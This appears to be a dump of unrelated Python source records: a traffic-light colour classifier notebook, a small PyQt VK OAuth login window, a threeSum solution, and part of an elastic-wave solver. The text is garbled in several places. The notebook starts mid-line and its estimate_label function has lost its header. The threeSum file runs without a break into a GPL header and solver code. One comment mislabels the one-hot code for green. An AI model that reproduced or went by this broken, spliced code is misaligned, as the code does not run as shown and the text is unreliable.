mathematical statistics --> adding this\nimport numpy as np # numpy library\nimport matplotlib.pyplot as plt # plot images\nimport matplotlib.image as mpimg # for loading in images\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# ## Training and Testing Data\n# \n# All 1484 of the traffic light images are separated into training and testing datasets. \n# \n# * 80% of these images are training images, for you to use as you create a classifier.\n# * 20% are test images, which will be used to test the accuracy of your classifier.\n# * All images are pictures of 3-light traffic lights with one light illuminated.\n# \n# ## Define the image directories\n# \n# First, we set some variables to keep track of some where our images are stored:\n# \n# IMAGE_DIR_TRAINING: the directory where our training image data is stored\n# IMAGE_DIR_TEST: the directory where our test image data is stored\n\n# In[347]:\n\n\n\"\"\"Datasets.\nDefine the image directories.\n\"\"\"\n# Image data directories\nIMAGE_DIR_TRAINING = \"traffic_light_images/training/\"\nIMAGE_DIR_TEST = \"traffic_light_images/test/\"\n\n\n# ## Load the datasets\n# \n# These first few lines of code will load the training traffic light images and store all of them in a variable, `IMAGE_LIST`. This list contains the images and their associated label (\"red\", \"yellow\", \"green\"). \n# \n# You are encouraged to take a look at the `load_dataset` function in the helpers.py file. This will give you a good idea about how lots of image files can be read in from a directory using the [glob library](https://pymotw.com/2/glob/). The `load_dataset` function takes in the name of an image directory and returns a list of images and their associated labels. 
\n# \n# For example, the first image-label pair in `IMAGE_LIST` can be accessed by index: \n# ``` IMAGE_LIST[0][:]```.\n# \n\n# In[348]:\n\n\n\"\"\"Loading Datasets.\nUsing the load_dataset function in helpers.py file.\n\"\"\"\n# Load training data\nIMAGE_LIST = helpers.load_dataset(IMAGE_DIR_TRAINING)\n\n\n# ## Visualize the Data\n# \n# The first steps in analyzing any dataset are to 1. load the data and 2. look at the data. Seeing what it looks like will give you an idea of what to look for in the images, what kind of noise or inconsistencies you have to deal with, and so on. This will help you understand the image dataset, and **understanding a dataset is part of making predictions about the data**.\n\n# ---\n# ### Visualize the input images\n# \n# Visualize and explore the image data! Write code to display an image in `IMAGE_LIST`:\n# * Display the image\n# * Print out the shape of the image \n# * Print out its corresponding label\n# \n# See if you can display at least one of each type of traffic light image – red, green, and yellow — and look at their similarities and differences.\n\n# In[349]:\n\n\n\"\"\"Visualize the Images from IMAGE_LIST.\n1). Display an image.\n2). Print out the shape of the image.\n3). Print out its corresponding label.\n4). Display the example of each image, Red, Yellow, Green.\n\"\"\" \n# ---------------- Mapping ----------------\n# Red Traffic from array 0 until 722\n# Yellow Traffic from array 723 until 757\n# Green Traffic from array 758 until 1186\n# -----------------------------------------\n# Image Array\n# Change this value to check the others\nimg_array = 728\n\n# Image & Label Variables\nvar_image = IMAGE_LIST[img_array][0]\nvar_label = IMAGE_LIST[img_array][1]\n\n# 1). Display the Image\nf, (fg1) = plt.subplots(1, 1, figsize=(10,5))\nfg1.set_title(str(var_label))\nfg1.imshow(var_image)\n\n# 2). Print out the shape of the image\nprint(\"Image Shape:\", var_image.shape)\n\n# 3). Print out its corresponding label\nprint(\"Image Label:\", var_label)\n\n# 4). Display the example of each image, Red, Yellow, Green\nf, (fg1, fg2, fg3) = plt.subplots(1, 3, figsize=(10,5))\nfg1.set_title('Red')\nfg1.imshow(IMAGE_LIST[3][0])\nfg2.set_title('Yellow')\nfg2.imshow(IMAGE_LIST[737][0])\nfg3.set_title('Green')\nfg3.imshow(IMAGE_LIST[777][0])\n\n\n# # 2. Pre-process the Data\n# \n# After loading in each image, you have to standardize the input and output!\n# \n# ### Input\n# \n# This means that every input image should be in the same format, of the same size, and so on. We'll be creating features by performing the same analysis on every picture, and for a classification task like this, it's important that **similar images create similar features**! \n# \n# ### Output\n# \n# We also need the output to be a label that is easy to read and easy to compare with other labels. It is good practice to convert categorical data like \"red\" and \"green\" to numerical data.\n# \n# A very common classification output is a 1D list that is the length of the number of classes - three in the case of red, yellow, and green lights - with the values 0 or 1 indicating which class a certain image is. For example, since we have three classes (red, yellow, and green), we can make a list with the order: [red value, yellow value, green value]. In general, order does not matter, we choose the order [red value, yellow value, green value] in this case to reflect the position of each light in descending vertical order.\n# \n# A red light should have the label: [1, 0, 0]. 
Yellow should be: [0, 1, 0]. Green should be: [0, 0, 1]. These labels are called **one-hot encoded labels**.\n# \n# *(Note: one-hot encoding will be especially important when you work with [machine learning algorithms](https://machinelearningmastery.com/how-to-one-hot-encode-sequence-data-in-python/)).*\n# \n# \n# \n\n# ---\n# \n# ### (IMPLEMENTATION): Standardize the input images\n# \n# * Resize each image to the desired input size: 32x32px.\n# * (Optional) You may choose to crop, shift, or rotate the images in this step as well.\n# \n# It's very common to have square input sizes that can be rotated (and remain the same size), and analyzed in smaller, square patches. It's also important to make all your images the same size so that they can be sent through the same pipeline of classification steps!\n\n# In[350]:\n\n\ndef standardize_input(image):\n \"\"\"Standardize Image.\n This function take an RGB image and return a standardized version.\n Resizing each image into 32x32 pixel, and adjust to 24x16 pixel.\n \"\"\"\n # Return an array copy of the image\n clone_image = np.copy(image)\n \n # Resize to 32x32 pixel\n resize_image = cv2.resize(clone_image, (32, 32))\n \n # Adjusting image to 24x16 pixel\n row_crop = 4 # 32-4-4 = 24\n col_crop = 8 # 32-8-8 = 16\n standard_image = resize_image[row_crop:-row_crop, col_crop:-col_crop, :]\n \n # Return result\n return standard_image \n\n\n# ## Standardize the output\n# \n# With each loaded image, we also specify the expected output. For this, we use **one-hot encoding**.\n# \n# * One-hot encode the labels. To do this, create an array of zeros representing each class of traffic light (red, yellow, green), and set the index of the expected class number to 1. \n# \n# Since we have three classes (red, yellow, and green), we have imposed an order of: [red value, yellow value, green value]. To one-hot encode, say, a yellow light, we would first initialize an array to [0, 0, 0] and change the middle value (the yellow value) to 1: [0, 1, 0].\n# \n\n# ---\n# \n# ### (IMPLEMENTATION): Implement one-hot encoding\n\n# In[351]:\n\n\ndef one_hot_encode(label):\n \"\"\"One-Hot Encoding.\n This function given a label - \"red\", \"green\", or \"yellow\",\n returning a one-hot encoded label.\n One-Hot Encode of \"red\" return: [1, 0, 0]\n One-Hot Encode of \"yellow\" return: [0, 1, 0]\n One-Hot Encode of \"green\" return: [0, 0, 1]\n \"\"\"\n # Init Variable\n one_hot_encoded = []\n \n # Processing\n if label == \"red\":\n one_hot_encoded = [1, 0, 0]\n elif label == \"yellow\":\n one_hot_encoded = [0, 1, 0]\n elif label == \"green\":\n one_hot_encoded = [0, 0, 1]\n else:\n one_hot_encoded = [0, 0, 0]\n \n # Return result\n return one_hot_encoded\n\n\n# ### Testing as you Code\n# \n# After programming a function like this, it's a good idea to test it, and see if it produces the expected output. **In general, it's good practice to test code in small, functional pieces, after you write it**. This way, you can make sure that your code is correct as you continue to build a classifier, and you can identify any errors early on so that they don't compound.\n# \n# All test code can be found in the file `test_functions.py`. You are encouraged to look through that code and add your own testing code if you find it useful!\n# \n# One test function you'll find is: `test_one_hot(self, one_hot_function)` which takes in one argument, a one_hot_encode function, and tests its functionality. 
If your one_hot_label code does not work as expected, this test will print out an error message that will tell you a bit about why your code failed. Once your code works, this should print out TEST PASSED.\n\n# In[352]:\n\n\n\"\"\"Testing One-Hot Encoding.\nTo see if it produces the expected output.\n\"\"\"\n# Importing the tests\nimport test_functions\ntests = test_functions.Tests()\n\n# Test for one_hot_encode function\ntests.test_one_hot(one_hot_encode)\n\n\n# ## Construct a `STANDARDIZED_LIST` of input images and output labels.\n# \n# This function takes in a list of image-label pairs and outputs a **standardized** list of resized images and one-hot encoded labels.\n# \n# This uses the functions you defined above to standardize the input and output, so those functions must be complete for this standardization to work!\n# \n\n# In[353]:\n\n\ndef standardize(image_list):\n    \"\"\"Standardized List of Input Images and Output Labels.\n    This function takes in a list of image-label pairs and outputs\n    a standardized list of resized images and one-hot encoded labels.\n    \"\"\" \n    # Empty image data array\n    standard_list = []\n\n    # Iterate through all the image-label pairs\n    for item in image_list:\n        image = item[0]\n        label = item[1]\n\n        # Standardize the image\n        standardized_im = standardize_input(image)\n\n        # One-hot encode the label\n        one_hot_label = one_hot_encode(label) \n\n        # Append the image, and its one hot encoded label, to the full, processed list of image data \n        standard_list.append((standardized_im, one_hot_label))\n    \n    # Return result\n    return standard_list\n\n# Standardize all of the training images\nSTANDARDIZED_LIST = standardize(IMAGE_LIST)\n\n\n# ## Visualize the standardized data\n# \n# Display a standardized image from STANDARDIZED_LIST and compare it with a non-standardized image from IMAGE_LIST. Note that their sizes and appearance are different!\n\n# In[354]:\n\n\n\"\"\"Visualize the Standardized Images.\nDisplay a standardized image from STANDARDIZED_LIST,\nand compare it with a non-standardized image from IMAGE_LIST. \n\"\"\" \n# ---------------- Mapping ----------------\n# Red Traffic from array 0 until 722\n# Yellow Traffic from array 723 until 757\n# Green Traffic from array 758 until 1186\n# -----------------------------------------\n# Image Array\n# Change this value to check the others\nimg_array = 1000\n\n# Image & Label from IMAGE_LIST\nori_image = IMAGE_LIST[img_array][0]\nori_label = IMAGE_LIST[img_array][1]\n\n# Image & Label from STANDARDIZED_LIST\nstd_image = STANDARDIZED_LIST[img_array][0]\nstd_label = STANDARDIZED_LIST[img_array][1]\n\n# Print out the shape of the image from IMAGE_LIST\nprint(\"Image Shape - Original:\", ori_image.shape)\n\n# Print out the shape of the image from STANDARDIZED_LIST\nprint(\"Image Shape - Standard:\", std_image.shape)\n\n# Print out its corresponding label from IMAGE_LIST\nprint(\"Image Label - Original:\", ori_label)\n\n# Print out its corresponding label from STANDARDIZED_LIST\nprint(\"Image Label - Standard:\", std_label)\n\n# Display the original and standardized images side by side\nf, (fg1, fg2) = plt.subplots(1, 2, figsize=(10,5))\nfg1.set_title('Original')\nfg1.imshow(ori_image)\nfg2.set_title('Standard')\nfg2.imshow(std_image)\n\n
\n# # 3. Feature Extraction\n# \n# You'll be using what you know about color spaces, shape analysis, and feature construction to create features that help distinguish and classify the three types of traffic light images.\n# \n# You'll be tasked with creating **one feature** at a minimum (with the option to create more). The required feature is **a brightness feature using HSV color space**:\n# \n# 1. A brightness feature.\n# - Using HSV color space, create a feature that helps you identify the 3 different classes of traffic light.\n# - You'll be asked some questions about what methods you tried to locate this traffic light, so, as you progress through this notebook, always be thinking about your approach: what works and what doesn't?\n# \n# 2. (Optional): Create more features! \n# \n# Any more features that you create are up to you and should improve the accuracy of your traffic light classification algorithm! One thing to note is that, to pass this project you must **never classify a red light as a green light** because this creates a serious safety risk for a self-driving car. To avoid this misclassification, you might consider adding another feature that specifically distinguishes between red and green lights.\n# \n# These features will be combined near the end of this notebook to form a complete classification algorithm.\n\n# ## Creating a brightness feature \n# \n# There are a number of ways to create a brightness feature that will help you characterize images of traffic lights, and it will be up to you to decide on the best procedure to complete this step. You should visualize and test your code as you go.\n# \n# Pictured below is a sample pipeline for creating a brightness feature (from left to right: standardized image, HSV color-masked image, cropped image, brightness feature):\n# \n# \n# 
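A minimal sketch of the pipeline just described, assuming a 24x16 standardized RGB image like the ones produced by standardize_input; the thirds split and the helper name brightness_feature are illustrative, not part of the project code:

import cv2
import numpy as np

def brightness_feature(rgb_image):
    hsv = cv2.cvtColor(rgb_image, cv2.COLOR_RGB2HSV)
    v = hsv[:, :, 2].astype(np.float32)  # V channel = brightness
    h = v.shape[0] // 3
    # sum the brightness in the top, middle, and bottom thirds;
    # the lit lamp should dominate exactly one of the three sums
    sums = [v[:h].sum(), v[h:2 * h].sum(), v[2 * h:].sum()]
    return int(np.argmax(sums))  # 0 = top (red), 1 = middle (yellow), 2 = bottom (green)

print(brightness_feature(np.zeros((24, 16, 3), dtype=np.uint8)))  # 0 on an all-black dummy image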
\n# ## RGB to HSV conversion\n# \n# Below, a test image is converted from RGB to HSV colorspace and each component is displayed in an image.\n\n# In[355]:\n\n\n\"\"\"RGB to HSV Conversion.\nConvert an image to HSV colorspace.\nVisualize the individual color channels,\nand display each Histogram of H, S, V.\n\"\"\" \n# ---------------- Mapping ----------------\n# Red Traffic from array 0 until 722\n# Yellow Traffic from array 723 until 757\n# Green Traffic from array 758 until 1186\n# -----------------------------------------\n# Image Array\n# Change this value to check the others\nimg_array = 1000\n\n# Image & Label from IMAGE_LIST\nori_image = IMAGE_LIST[img_array][0]\nori_label = IMAGE_LIST[img_array][1]\n\n# Image & Label from STANDARDIZED_LIST\nstd_image = STANDARDIZED_LIST[img_array][0]\nstd_label = STANDARDIZED_LIST[img_array][1]\n\n# Convert to HSV\nhsv_conversion = cv2.cvtColor(std_image, cv2.COLOR_RGB2HSV)\n\n# HSV channels\nh_channel = hsv_conversion[:,:,0]\ns_channel = hsv_conversion[:,:,1]\nv_channel = hsv_conversion[:,:,2]\n\n# Plot the original image and the three channels\nf, (fg1, fg2, fg3, fg4) = plt.subplots(1, 4, figsize=(10,5))\nfg1.set_title('Standard Image')\nfg1.imshow(std_image)\nfg2.set_title('H Channel')\nfg2.imshow(h_channel)\nfg3.set_title('S Channel')\nfg3.imshow(s_channel)\nfg4.set_title('V Channel')\nfg4.imshow(v_channel)\n\n# Histogram of HSV for each channel\nh_histogram = np.histogram(hsv_conversion[:,:,0], bins=32, range=(0, 255))\ns_histogram = np.histogram(hsv_conversion[:,:,1], bins=32, range=(0, 255))\nv_histogram = np.histogram(hsv_conversion[:,:,2], bins=32, range=(0, 255))\n\n# Generating bin centers of Histogram\nbin_edges = h_histogram[1]\nbin_centers = (bin_edges[1:] + bin_edges[0:len(bin_edges) - 1]) / 2\n\n# Plot each channel of the HSV Histogram \nfig = plt.figure(figsize=(10,3))\nplt.subplot(131)\nplt.bar(bin_centers, h_histogram[0])\nplt.xlim(0, 180)\nplt.title('H Histogram')\nplt.subplot(132)\nplt.bar(bin_centers, s_histogram[0])\nplt.xlim(0, 256)\nplt.title('S Histogram')\nplt.subplot(133)\nplt.bar(bin_centers, v_histogram[0])\nplt.xlim(0, 256)\nplt.title('V Histogram')\nplt.show()\n\n\n# ---\n# \n# ### (IMPLEMENTATION): Create a brightness feature that uses HSV color space\n# \n# Write a function that takes in an RGB image and returns a 1D feature vector and/or single value that will help classify an image of a traffic light. The only requirement is that this function should apply an HSV colorspace transformation, the rest is up to you. \n# \n# From this feature, you should be able to estimate an image's label and classify it as either a red, green, or yellow traffic light. You may also define helper functions if they simplify your code.
\n\n# In[359]:\n\n\n\"\"\"Extract Features.\nThis function takes in an RGB image,\nand outputs a feature vector and value.\nThis feature uses HSV colorspace values.\n\"\"\"\ndef extract_features(rgb_image):\n    # Using HSV color space\n    hsv_image = cv2.cvtColor(rgb_image, cv2.COLOR_RGB2HSV)\n    \n    # Get the brightest spots of the light\n    mask_bottom = np.array([0,27,123])\n    mask_top = np.array([178,236,254])\n    masking = cv2.inRange(hsv_image, mask_bottom, mask_top)\n    feature_hsv = cv2.bitwise_and(hsv_image, hsv_image, mask = masking)\n    \n    # Masking range of Red Color (8-bit hue tops out at 179, so 203 effectively means \"up to 179\")\n    lower_red = np.array([161])\n    upper_red = np.array([203])\n    red_masking = cv2.inRange(feature_hsv[:,:,0], lower_red, upper_red)\n    \n    # Masking range of Yellow Color\n    lower_yellow = np.array([9])\n    upper_yellow = np.array([31])\n    yellow_masking = cv2.inRange(feature_hsv[:,:,0], lower_yellow, upper_yellow)\n    \n    # Masking range of Green Color\n    lower_green = np.array([79]) \n    upper_green = np.array([101])\n    green_masking = cv2.inRange(feature_hsv[:,:,0], lower_green, upper_green)\n    \n    # Combine masks\n    combine_masking = red_masking + yellow_masking + green_masking\n    \n    # Copy Hue channel\n    feature = np.copy(hsv_image[:,:,0])\n    feature[combine_masking == 0] = [0]\n    \n    # Return result\n    return feature\n\n\n# ## (Optional) Create more features to help accurately label the traffic light images\n\n# In[362]:\n\n\n\"\"\"Additional Features.\nThese helpers are based on simple statistics:\nthe most common value (mode) and the middle\nvalue (median) of the nonzero masked pixels.\n\"\"\"\ndef mode_value(hsv_image):\n    total_mode = scipy.stats.mode(hsv_image[np.nonzero(hsv_image)])[0]\n    return total_mode[0] if len(total_mode) > 0 else 0\n\ndef median_value(hsv_image):\n    nonzero = hsv_image[np.nonzero(hsv_image)]\n    if len(nonzero) > 0:\n        return np.median(hsv_image[np.nonzero(hsv_image)])\n    return 0\n
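A small sanity check on the hue bands used in extract_features above. OpenCV stores 8-bit hue as 0-179, so an upper bound such as 203 can never be reached; red also wraps around 0, which is why the red band sits near the top of the range. The pixel values below are illustrative:

import cv2
import numpy as np

# one pure pixel of each colour, in RGB order
pixels = np.uint8([[[255, 0, 0], [255, 255, 0], [0, 255, 0]]])
hues = cv2.cvtColor(pixels, cv2.COLOR_RGB2HSV)[0, :, 0]
print(hues)  # [ 0 30 60]: pure red, yellow, and green land at hue 0, 30, and 60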
    # Threshold classification between red, yellow and green\n    if (median >= 162.) or (mode >= 176.):\n        predicted_label = one_hot_encode(\"red\") \n    elif (median >= 79. and median <= 161.):\n        predicted_label = one_hot_encode(\"green\")\n    elif (mode == 11.) and (median == 11.): # tricky threshold, worked only for this dataset\n        predicted_label = one_hot_encode(\"green\") \n    else:\n        predicted_label = one_hot_encode(\"yellow\") # everything unidentified is classified as yellow (the safe choice)\n    \n    # Return result\n    return predicted_label\n\n\n# ## Testing the classifier\n# \n# Here is where we test your classification algorithm using our test set of data that we set aside at the beginning of the notebook! This project will be complete once you've programmed a \"good\" classifier.\n# \n# A \"good\" classifier in this case should meet the following criteria (and once it does, feel free to submit your project):\n# 1. Get above 90% classification accuracy.\n# 2. Never classify a red light as a green light. \n# \n# ### Test dataset\n# \n# Below, we load in the test dataset, standardize it using the `standardize` function you defined above, and then **shuffle** it; this ensures that order will not play a role in testing accuracy.\n# \n\n# In[364]:\n\n\n\"\"\"Testing the classifier.\nUsing the load_dataset function in helpers.py\nwe load in the test dataset, standardize it, and then shuffle it.\nThis ensures that order will not play a role in testing accuracy.\n\"\"\"\n# Load test data\nTEST_IMAGE_LIST = helpers.load_dataset(IMAGE_DIR_TEST)\n\n# Standardize the test data\nSTANDARDIZED_TEST_LIST = standardize(TEST_IMAGE_LIST)\n\n# Shuffle the standardized test data\nrandom.shuffle(STANDARDIZED_TEST_LIST)\n\n\n# ## Determine the Accuracy\n# \n# Compare the output of your classification algorithm (a.k.a. your \"model\") with the true labels and determine the accuracy.\n# \n# This code stores all the misclassified images, their predicted labels, and their true labels, in a list called `MISCLASSIFIED`. This code is used for testing and *should not be changed*.\n
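# A quick aside on the label format (the encoding itself is set by the one_hot_encode function defined earlier in the notebook): both the predicted and the true labels are one-hot lists of length 3, one slot per class, so the comparison in the next cell is a plain list equality check.\n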
\n\n# In[365]:\n\n\n\"\"\"Determine the Accuracy.\nConstructs a list of misclassified images given a list of test images and their labels.\nThis will throw an AssertionError if labels are not standardized (one-hot encoded).\nIt also checks the accuracy of this classifier.\n\"\"\" \ndef get_misclassified_images(test_images):\n    # Track misclassified images by placing them into a list\n    misclassified_images_labels = []\n\n    # Iterate through all the test images\n    # Classify each image and compare to the true label\n    for image in test_images:\n        # Get true data\n        im = image[0]\n        true_label = image[1]\n        assert(len(true_label) == 3), \"The true_label is not the expected length (3).\"\n\n        # Get predicted label from the classifier\n        predicted_label = estimate_label(im)\n        assert(len(predicted_label) == 3), \"The predicted_label is not the expected length (3).\"\n\n        # Compare true and predicted labels \n        if(predicted_label != true_label): \n            # If these labels are not equal, the image has been misclassified\n            misclassified_images_labels.append((im, predicted_label, true_label))\n        \n    # Return the list of misclassified [image, predicted_label, true_label] values\n    return misclassified_images_labels\n\n# Find all misclassified images in a given test set\nMISCLASSIFIED = get_misclassified_images(STANDARDIZED_TEST_LIST)\n\n# Accuracy calculations\ntotal = len(STANDARDIZED_TEST_LIST)\nnum_correct = total - len(MISCLASSIFIED)\naccuracy = num_correct/total\n\n# Print Result of Accuracy and Misclassified Images\nprint('Accuracy of Traffic Light Classifier = {:.2f}%'.format(accuracy*100) + ' (' + str(accuracy) + ')')\nprint(\"Number of misclassified images = \" + str(len(MISCLASSIFIED)) +' out of '+ str(total) + ' images')\n\n\n# ---\n# \n# ### Visualize the misclassified images\n# \n# Visualize some of the images you classified wrong (in the `MISCLASSIFIED` list) and note any qualities that make them difficult to classify. This will help you identify any weaknesses in your classification algorithm.\n\n# In[366]:\n\n\n\"\"\"Visualize the Misclassified Images.\nDisplay an image in the `MISCLASSIFIED` list.\nPrint out its predicted label to see what\nthe image *was* incorrectly classified as.\n\"\"\" \nprint('-------------------')\nprint('-- MISCLASSIFIED -- ')\n\n# Init Variables\nimages_misclassified = []\nimg_count = 0\n\n# Check each image in the misclassified list\nfor image in MISCLASSIFIED:\n    # Counting images\n    img_count += 1\n    print('-------------------')\n    \n    # Check the features\n    images_misclassified = image[0]\n    masked_image = extract_features(image[0])\n    print('Image :', img_count)\n    print('Mode :', mode_value(masked_image))\n    print('Median :', median_value(masked_image))\n    print('Predict :', image[1])\n    print('Actual :', image[2])\n    \n    # Plot the misclassified images\n    f, (fg1, fg2) = plt.subplots(1, 2, figsize=(5,3))\n    fg1.set_title('Standard ' + str(img_count))\n    fg1.imshow(images_misclassified)\n    fg2.set_title('Masked ' + str(img_count))\n    fg2.imshow(masked_image)\nprint('-------------------')\n\n\n# ---\n# \n# ## (Question 2): After visualizing these misclassifications, what weaknesses do you think your classification algorithm has? Please note at least two.\n\n# **Answer:** \n# 1. Masking using HSV values cannot cover every color variation, especially the 'abnormal' ones. \n# 2. 'abnormal' means that a color that is supposed to be 'red' is not 'red', 'yellow' is not 'yellow', and 'green' is not 'green'.\n# 3. In this case, all images that could not be identified have an almost white/gray color.\n# 4. We would need machine learning for more accurate results.\n
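# A minimal sketch to quantify the washed-out look noted above (assuming only MISCLASSIFIED, cv2 and np from the cells above):\nfor image in MISCLASSIFIED:\n    saturation = cv2.cvtColor(image[0], cv2.COLOR_RGB2HSV)[:,:,1]\n    print('mean saturation of a misclassified image:', np.mean(saturation))\n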
\n# ## Test if you classify any red lights as green\n# \n# **To pass this project, you must not classify any red lights as green!** Classifying red lights as green would cause a car to drive through a red traffic light, so this red-as-green error is very dangerous in the real world. \n# \n# The code below lets you test to see if you've misclassified any red lights as green in the test set. **This test assumes that `MISCLASSIFIED` is a list of tuples with the order: [misclassified_image, predicted_label, true_label].**\n# \n# Note: this is not an all-encompassing test, but it's a good indicator that, if you pass, you are on the right track! This iterates through your list of misclassified examples and checks to see if any red traffic lights have been mistakenly labelled [0, 1, 0] (green).\n\n# In[367]:\n\n\n\"\"\"Testing Red as Green Light.\nTest if we misclassified any red lights as green.\nClassifying red lights as green would cause a car to\ndrive through a red traffic light, so this red-as-green\nerror is very dangerous in the real world.\n\"\"\" \n# Importing the tests\nimport test_functions\ntests = test_functions.Tests()\n\n# Checking red as green\nif(len(MISCLASSIFIED) > 0):\n    # Test code for the one_hot_encode function\n    tests.test_red_as_green(MISCLASSIFIED)\nelse:\n    print(\"MISCLASSIFIED may not have been populated with images.\")\n
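# A minimal sketch of the kind of check test_red_as_green performs (illustrative only -- the real implementation lives in test_functions.py, which is not shown here; this reuses one_hot_encode from the earlier cells):\nfor im, predicted, true in MISCLASSIFIED:\n    if true == one_hot_encode('red') and predicted == one_hot_encode('green'):\n        print('Dangerous: a red light was classified as green!')\n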
\n\n# # 5. Improve your algorithm!\n# \n# **Submit your project after you have completed all implementations, answered all questions, AND when you've met the two criteria:**\n# 1. Greater than 90% classification accuracy\n# 2. No red lights classified as green\n# \n# If you did not meet these requirements (which is common on the first attempt!), revisit your algorithm and tweak it to improve light recognition -- this could mean changing the brightness feature, performing some background subtraction, or adding another feature!\n# \n# ---\n\n# ### Going Further (Optional Challenges)\n# \n# If you found this challenge easy, I suggest you go above and beyond! Here are a couple **optional** (meaning you do not need to implement these to submit and pass the project) suggestions:\n# * (Optional) Aim for >95% classification accuracy.\n# * (Optional) Some lights are in the shape of arrows; further classify the lights as round or arrow-shaped.\n# * (Optional) Add another feature and aim for as close to 100% accuracy as you can get!\n","sub_path":"Intro to Self-Driving Cars/P5 - Traffic Light/Traffic_Light_Classifier.py","file_name":"Traffic_Light_Classifier.py","file_ext":"py","file_size_in_byte":31987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"650622579","text":"import re\nimport sys\nfrom PyQt4 import QtWebKit, QtCore, QtGui\n\n\nclass MainWindow(QtWebKit.QWebView):\n    def __init__(self):\n        QtGui.QMainWindow.__init__(self)\n        self.oauthurl = \"https://oauth.vk.com/authorize?client_id=4923952&\" \\\n                        \"scope=messages,groups,friends,status&\" \\\n                        \"redirect_uri=https://oauth.vk.com/blank.html&\" \\\n                        \"display=page&\" \\\n                        \"v=5.33&\" \\\n                        \"response_type=token\"\n        self.load(QtCore.QUrl(self.oauthurl))\n\n\n    def closeEvent(self, QCloseEvent):\n        token = re.findall('access_token=(.+)&e', self.url().toString())\n\n\nif __name__ == '__main__':\n    app = QtGui.QApplication(sys.argv)\n    mw = MainWindow()\n    mw.show()\n    app.exec_()","sub_path":"apicon/mod_vk.py","file_name":"mod_vk.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"114310799","text":"# Given an array nums of n integers, are there elements a, b, c in nums \n# such that a + b + c = 0? Find all unique triplets in the array which gives \n# the sum of zero.\n\n# Note:\n\n# The solution set must not contain duplicate triplets.\n\n# Example:\n\n# Given array nums = [-1, 0, 1, 2, -1, -4],\n\n# A solution set is:\n# [\n#   [-1, 0, 1],\n#   [-1, -1, 2]\n# ]\n\n\n\ndef threeSum(nums):\n\n    nums.sort()\n    result = []\n\n    for i in range(len(nums)-2):\n        if i >0 and nums[i] == nums[i-1]:\n            continue\n        \n        left=i+1\n        right=len(nums)-1\n        \n        while left<right:\n            total = nums[i]+nums[left]+nums[right]\n            if total < 0:\n                left=left+1\n            elif total > 0:\n                right=right-1\n            else:\n                result.append([nums[i],nums[left],nums[right]])\n                while left<right and nums[left]==nums[left+1]:\n                    left=left+1\n                while left<right and nums[right]==nums[right-1]:\n                    right=right-1\n                left=left+1\n                right=right-1\n\n    return result\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n\n\"\"\"\nAnisotropic velocity-stress equations solver using the linear CESE method.\n\"\"\"\n\nfrom solvcon.gendata import TypeNameRegistry\nfrom solvcon.anchor import Anchor\nfrom solvcon.hook import BlockHook\nfrom solvcon.kerpak.cese import CeseBC\nfrom solvcon.kerpak.lincese import (LinceseSolver, LinceseCase,\n PlaneWaveSolution)\n\n###############################################################################\n# Solver.\n###############################################################################\n\nclass ElaslinSolver(LinceseSolver):\n \"\"\"\n Basic elastic solver.\n\n @ivar mtrldict: map from names to material objects.\n @itype mtrldict: dict\n @ivar mtrllist: list of all material objects.\n @itype mtrllist: list\n \"\"\"\n from solvcon.dependency import getcdll\n __clib_elaslin = {\n 2: getcdll('elaslin2d', raise_on_fail=False),\n 3: getcdll('elaslin3d', raise_on_fail=False),\n }\n del getcdll\n @property\n def _clib_elaslin(self):\n return self.__clib_elaslin[self.ndim]\n @property\n def _gdlen_(self):\n return 9 * 9 * self.ndim\n def __init__(self, *args, **kw):\n super(ElaslinSolver, self).__init__(*args, **kw)\n self.mtrldict = kw.pop('mtrldict', {})\n self.mtrllist = None\n def make_grpda(self):\n self.mtrllist = self._build_mtrllist(self.grpnames, self.mtrldict)\n for igrp in range(len(self.grpnames)):\n mtrl = self.mtrllist[igrp]\n jaco = self.grpda[igrp].reshape(self.neq, self.neq, self.ndim)\n mjacos = mtrl.get_jacos()\n for idm in range(self.ndim):\n jaco[:,:,idm] = mjacos[idm,:,:]\n @staticmethod\n def _build_mtrllist(grpnames, mtrldict):\n \"\"\"\n Build the material list out of the mapping dict.\n\n @type grpnames: list\n @param mtrldict: the map from names to material objects.\n @type mtrldict: dict\n @return: the list of material object.\n @rtype: Material\n \"\"\"\n mtrllist = list()\n default_mtuple = mtrldict.get(None, None)\n for grpname in grpnames:\n try:\n mtrl = mtrldict.get(grpname, default_mtuple)\n except KeyError as e:\n args = e.args[:]\n args.append('no material named %s in mtrldict'%grpname)\n e.args = args\n raise\n mtrllist.append(mtrl)\n return mtrllist\n\n###############################################################################\n# Case.\n###############################################################################\n\nclass ElaslinCase(LinceseCase):\n \"\"\"\n Case for anisotropic elastic solids.\n \"\"\"\n defdict = {\n 'execution.neq': 9,\n 'solver.solvertype': ElaslinSolver,\n 'solver.mtrldict': dict,\n }\n def make_solver_keywords(self):\n kw = super(ElaslinCase, self).make_solver_keywords()\n # setup material mapper.\n kw['mtrldict'] = self.solver.mtrldict\n return kw\n\n###############################################################################\n# Boundary conditions.\n###############################################################################\n\nclass ElaslinBC(CeseBC):\n \"\"\"\n Basic BC class for elastic problems.\n \"\"\"\n from solvcon.dependency import getcdll\n __clib_elaslinb = {\n 2: getcdll('elaslinb2d', raise_on_fail=False),\n 3: getcdll('elaslinb3d', raise_on_fail=False),\n }\n del getcdll\n @property\n def _clib_elaslinb(self):\n return self.__clib_elaslinb[self.svr.ndim]\n\nclass ElaslinTraction(ElaslinBC):\n vnames = [\n 'bfcsys', 
